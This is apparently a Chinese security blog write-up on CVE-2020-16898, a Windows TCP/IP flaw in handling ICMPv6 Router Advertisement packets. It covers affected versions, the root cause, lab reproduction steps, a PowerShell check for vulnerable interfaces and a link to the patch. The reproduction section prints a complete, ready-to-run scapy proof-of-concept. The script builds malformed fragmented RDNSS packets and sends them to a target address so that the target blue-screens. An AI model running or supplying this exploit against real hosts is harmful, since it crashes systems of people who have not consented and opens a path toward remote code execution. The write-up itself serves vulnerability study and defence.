0x00 漏洞背景
2020年10月14日,某监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告,该漏洞是由于Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞,远程攻击者通过构造特制的ICMPv6 Router Advertisement(路由通告)数据包 ,并将其发送到远程Windows主机上,可造成远程BSOD,漏洞编号为CVE-2020-16898。
0x01 影响版本
| 操作系统 | 版本 | 版本补丁 | 经过测试 |
|---|---|---|---|
| Windows 10 | X86 / x64 / ARM64 | 1709 | ✔️ |
| Windows 10 | X86 / x64 / ARM64 | 1803 | ✔️ |
| Windows 10 | X86 / x64 / ARM64 | 1809年 | ✔️ |
| Windows 10 | X86 / x64 / ARM64 | 1903年 | ✔️ |
| Windows 10 | X86 / x64 / ARM64 | 1909年 | ✔️ |
| Windows 10 | X86 / x64 / ARM64 | 2004年 | ✔️ |
| Windows Server 2019 | |||
| Windows Server 2019(服务器核心版) | |||
| Windows Server 1903版(服务器核心版) | |||
| Windows Server版本1909(服务器核心版) | |||
| Windows Server 2004版(服务器核心版本) |
0x02 漏洞成因
根据rfc5006 描述,RDNSS包的length应为奇数,而当攻击者构造的RDNSS包的Length为偶数时,Windows TCP/IP 在检查包过程中会根据Length来获取每个包的偏移,遍历解析,导致对 Addresses of IPv6 Recursive DNS Servers 和下一个 RDNSS 选项的边界解析错误,从而绕过验证,将攻击者伪造的option包进行解析,造成栈溢出,从而导致系统崩溃。
0x03 漏洞复现
攻击机:win10x64
靶机:Windows 10x64_1709
1.通过vmware对受害主机开启IPV6
2.对CVE-2020-16898.py脚本中的IPV6地址进行修改,这里分别为攻击机的本来连接IPV6地址以及靶机IPV6地址。
#!/usr/bin/env python3 # # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability # # Author: Adam 'pi3' Zabrocki # http://pi3.com.pl from scapy.all import * from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6 v6_dst = "fd15:4ba5:5a2b:1008:9d37:36d2:3363:6496" #目标靶机IPv6 地址 v6_src = "fe80::ec1e:a7aa:6717:67c6%13" #攻击机本地链接 IPv6 地址 p_test_half = 'A'.encode()*8 + b"x18x30" + b"xFFx18" p_test = p_test_half + 'A'.encode()*4 c = ICMPv6NDOptEFA() e = ICMPv6NDOptRDNSS() e.len = 21 e.dns = [ "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ] aaa = ICMPv6NDOptRDNSS() aaa.len = 8 pkt = ICMPv6ND_RA() / aaa / Raw(load='A'.encode()*16*2 + p_test_half + b"x18xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ IPv6ExtHdrFragment()/pkt l=fragment6(p_test_frag, 200) for p in l: send(p)
3.最后使用命令pip3 install scapy,安装依赖包,执行CVE-2020-16898.py,即可看到靶机出现蓝屏
4.本地检查脚本:CVE-2020-16898_Checker.ps1
####################################################################################################### ### 14/10/2020 - Written by Cyril Pineiro / SYNAPSYS-IT ### Check if Network Interface is Vulnerable to CVE-2020-16898 & CVE-2020-16899 ### Returns Interface Index and Alias ####################################################################################################### Clear $interfaces = (Get-NetIPInterface | where {$_.AddressFamily -eq "IPv6"}).ifIndex foreach ($interface in $interfaces) { [bool]$vuln = $false $output = netsh int ipv6 sh interfaces interface=$interface foreach ($Line in $output) { if($Line.Contains("6106") -and $Line.Contains("enabled")) { [bool]$vuln = $true } } $NetIPInterfaceAlias = ((Get-NetIPAddress -InterfaceIndex $interface | Select-Object InterfaceAlias)[0]).InterfaceAlias if ($vuln) { Write-Host "Interface '$($interface)' named '$($NetIPInterfaceAlias)' is Vulnerable to CVE-2020-16898 & CVE-2020-16899" -ForegroundColor Red } else { Write-Host "Interface '$($interface)' named '$($NetIPInterfaceAlias)' is Not Vulnerable to CVE-2020-16898 & CVE-2020-16899" -ForegroundColor Green } }
0x04 漏洞修复
通过如下链接自行寻找符合操作系统版本的漏洞补丁,并进行补丁下载安装
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898